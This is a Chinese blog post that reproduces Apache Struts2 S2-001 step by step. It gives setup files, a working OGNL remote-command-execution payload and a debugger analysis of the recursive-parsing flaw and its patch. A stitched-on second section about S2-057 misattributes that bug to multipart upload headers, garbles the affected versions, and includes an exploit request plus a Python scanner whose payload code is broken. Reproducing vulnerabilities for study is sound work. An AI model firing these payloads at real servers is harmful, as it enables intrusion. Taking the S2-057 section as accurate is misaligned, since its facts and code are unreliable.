S2-001本地复现与分析

环境搭建:win10   eclipes ee    struts2.0.1   tomcat8

导入最基础的jar包

web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://xmlns.jcp.org/xml/ns/javaee" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" id="WebApp_ID" version="3.1">
  <display-name>S2-001 Example</display-name>
  <filter>
    <filter-name>struts2</filter-name>
    <filter-class>org.apache.struts2.dispatcher.FilterDispatcher</filter-class>
  </filter>
  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>

LoginAction.java

package com.au.demo.action;

import com.opensymphony.xwork2.ActionSupport;

public class LoginAction extends ActionSupport {
    private String username = null;
    private String password = null;

    public String getUsername() {
        return this.username;
    }

    public String getPassword() {
        return this.password;
    }

    public void setUsername(String username) {
        this.username = username;
    }

    public void setPassword(String password) {
        this.password = password;
    }

    public String execute() throws Exception {
        if ((this.username.isEmpty()) || (this.password.isEmpty())) {
            return ERROR;
        }
        if ((this.username.equalsIgnoreCase("admin"))
                && (this.password.equals("password"))) {
            return SUCCESS;
        }
        return ERROR;
    }
}

index.jsp

<%@ page language="java" contentType="text/html; charset=UTF-8"
         pageEncoding="UTF-8"%>
<%@ taglib prefix="s" uri="/struts-tags" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <title>S2-001</title>
</head>
<body>
<h2>S2-001 Demo</h2>
<s:form action="login">
  <s:textfield name="username" label="username" />
  <s:textfield name="password" label="password" />
  <s:submit></s:submit>
</s:form>
</body>
</html>

struts.xml

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE struts PUBLIC
	"-//Apache Software Foundation//DTD Struts Configuration 2.3//EN"
	"http://struts.apache.org/dtds/struts-2.3.dtd">

<struts>
	<constant name="struts.devMode" value="true" /> 
	<package name="S2-001" extends="struts-default">
        <action name="login" class="com.au.demo.action.LoginAction">
            <result name="success">/welcome.jsp</result>
            <result name="error">/index.jsp</result>
        </action>
    </package>
	
</struts>

导入对应的xwork.jar源码进行调试(找源码坑死我了)

有需要的这是本人搭建的环境下载地址:

https://pan.baidu.com/s/1_BBEIfoX-WSjLHQcqstVPA   提取码:aklq

测试点击提交:

构造的ognl被执行:

任意代码执行的POC:

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"pwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),
#f.getWriter().close()
}

pwd替换为对应的命令,即可执行。

 

漏洞分析:

漏洞成因:

     可执行代码(ognl(可理解为代码)):

     在translateVariables方法中,递归解析表达式,在处理完%{password}后将password的值直接取出并继续在while循环中解析,若用户输入的password是恶意的ognl表达式,则得以解析执行。

     输入点:可构造恶意参数

     输出点:利用登录失败会重新返回页面并回带之前的输入内容

 

 

在xwork的jar包下com.opensymphony.xwork2.util.TextUtils 98行设置断点debug tomcat单步调试

关键代码:

 public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator) {
        // deal with the "pure" expressions first!
        //expression = expression.trim();
        Object result = expression;

        while (true) {
            int start = expression.indexOf(open + "{");
            int length = expression.length();
            int x = start + 2;
            int end;
            char c;
            int count = 1;
            while (start != -1 && x < length && count != 0) {
                c = expression.charAt(x++);
                if (c == '{') {
                    count++;
                } else if (c == '}') {
                    count--;
                }
            }
            end = x - 1;

            if ((start != -1) && (end != -1) && (count == 0)) {
                String var = expression.substring(start + 2, end);

                Object o = stack.findValue(var, asType);
                if (evaluator != null) {
                	o = evaluator.evaluate(o);
                }
                

                String left = expression.substring(0, start);
                String right = expression.substring(end + 1);
                if (o != null) {
                    if (TextUtils.stringSet(left)) {
                        result = left + o;
                    } else {
                        result = o;
                    }

                    if (TextUtils.stringSet(right)) {
                        result = result + right;
                    }

                    expression = left + o + right;
                } else {
                    // the variable doesn't exist, so don't display anything
                    result = left + right;
                    expression = left + right;
                }
            } else {
                break;
            }
        }

        return XWorkConverter.getInstance().convertValue(stack.getContext(), result, asType);
    }

 

通过对比username和password来进行分析:

顺序执行,expression值为username

 

多个return递归回到该方法,通过  stack.findValue() 得到username的输入值, 最后aaa 被赋值给 expression

 

注意这里和password进行比较~

继续单步调试再次进入该方法(递归解析ognl):不符合while执行118行

此时不符合if条件     if ((start != -1) && (end != -1) && (count == 0)) 

进入多次return结束对username标签的执行回显到页面上


 

顺序执行,expression值为password

 

多个return递归回到该方法,通过  stack.findValue() 得到password的输入值,此时我们输入password的值 %{3+4}  被赋值给 expression

 

再次进入该方法,此时为ognl表示式,符合while条件和if判断,接下来就顺序解析了我们的  %{3+4}   expression赋值为7

进入多次return结束对password标签的执行回显到页面上

 

 

漏洞修复:

改变了ognl表达式的解析方法从而不会产生递归解析,用户的输入也不会再解析执行。

修补后的代码:增加判断

if (loopCount > maxLoopCount) {
    // translateVariables prevent infinite loop / expression recursive evaluation
    break;
}

当解析完一层表达式后,使其不符合上述判断,不再向下执行,执行break,跳出while(true)循环

源码(注释写的很清楚):

public static Object translateVariables(char open, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
    // deal with the "pure" expressions first!
    //expression = expression.trim();
    Object result = expression;
    int loopCount = 1;
    int pos = 0;
    while (true) {
        
        int start = expression.indexOf(open + "{", pos);
        if (start == -1) {
            pos = 0;
            loopCount++;
            start = expression.indexOf(open + "{");
        }
        if (loopCount > maxLoopCount) {
            // translateVariables prevent infinite loop / expression recursive evaluation
            break;
        }
        int length = expression.length();
        int x = start + 2;
        int end;
        char c;
        int count = 1;
        while (start != -1 && x < length && count != 0) {
            c = expression.charAt(x++);
            if (c == '{') {
                count++;
            } else if (c == '}') {
                count--;
            }
        }
        end = x - 1;

 

### Struts2 S2-057 漏洞概述 Struts2 的 S2-057 漏洞主要源于其对多部分请求(multipart requests)处理不当,允许攻击者通过构造恶意的 Content-Disposition 头部来触发 OGNL 表达式的执行[^2]。此漏洞可能导致远程代码执行 (RCE),从而让攻击者完全控制目标服务器。 --- ### S2-057 漏洞复现环境准备 为了成功复现该漏洞,需搭建如下测试环境: #### 1. **依赖组件** - Apache Struts2 版本:受影响版本为 2.3.x 前缀至 2.3.322.5.x 前缀至 2.5.10。 - Java 运行时环境 (JRE/JDK):建议使用 JDK 8 或更低版本以匹配当时的开发环境。 - Web 容器:Tomcat 是常用的容器之一。 #### 2. **配置文件调整** 确保 `struts.xml` 文件中启用了文件上传功能的相关设置: ```xml <interceptors> <interceptor-stack name="fileUploadStack"> <interceptor-ref name="defaultStack"/> <interceptor-ref name="fileUpload"/> </interceptor-stack> </interceptors> <action name="upload" class="com.example.UploadAction"> <interceptor-ref name="fileUploadStack"/> <result>/success.jsp</result> </action> ``` 上述配置表明应用支持文件上传操作,并可能暴露潜在风险。 --- ### S2-057 测试方法 以下是针对 S2-057 漏洞的具体测试流程: #### 1. 构造 HTTP 请求包 利用工具如 Burp Suite 发送自定义 POST 请求,其中包含恶意的 Content-Disposition 参数。例如: ```http POST /struts2-showcase/fileupload/upload.action HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Content-Type: multipart/form-data; boundary=---------------------------243620506915724 Content-Length: 253 -----------------------------243620506915724 Content-Disposition: form-data; name="foo"; filename="${@java.lang.Runtime@getRuntime().exec('calc')}" Content-Type: application/octet-stream test -----------------------------243620506915724-- ``` 在此示例中,`${}` 结构被用于嵌入 OGNL 表达式,尝试调用系统命令 `calc.exe` 来验证 RCE 能力。 #### 2. 验证漏洞效果 如果存在漏洞,则会观察到以下现象之一: - Windows 平台上弹出计算器窗口; - Linux/MacOS 上运行指定脚本或程序。 这证明了攻击者能够成功执行任意代码。 --- ### 编写自动化检测脚本 可以编写 Python 脚本来批量扫描是否存在此类漏洞。下面是一个简单的 PoC 实现: ```python import requests def test_s2_057(url, command='whoami'): headers = { 'User-Agent': 'Mozilla/5.0', 'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundary' } data = f'------WebKitFormBoundary\r\nContent-Disposition: form-data; name="foo"; filename="${{{"@".join(["@java", "lang", "Runtime@", "getRuntime()", ".exec(", repr(command), ")"])}}}"\r\nContent-Type: application/octet-stream\r\n\r\ntest\r\n------WebKitFormBoundary--' try: response = requests.post(url, headers=headers, data=data, timeout=10) if response.status_code == 200 and ('error' not in response.text.lower()): print(f"[+] Potential vulnerability detected at {url}") else: print(f"[-] No vulnerability found or error occurred.") except Exception as e: print(f"[!] Error during request: {e}") if __name__ == "__main__": target_url = input("Enter the URL to test: ").strip() test_s2_057(target_url) ``` 以上代码片段发送了一个带有特殊 payload 的 POST 请求给目标地址并解析响应结果判断是否有异常行为发生。 --- ### 总结 通过对 Struts2 S2-057 漏洞的学习可知,它属于典型的因输入校验不足引发的安全隐患案例。因此,在实际项目开发过程中应严格遵循最小权限原则以及充分的数据清洗机制防止类似问题再次出现。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值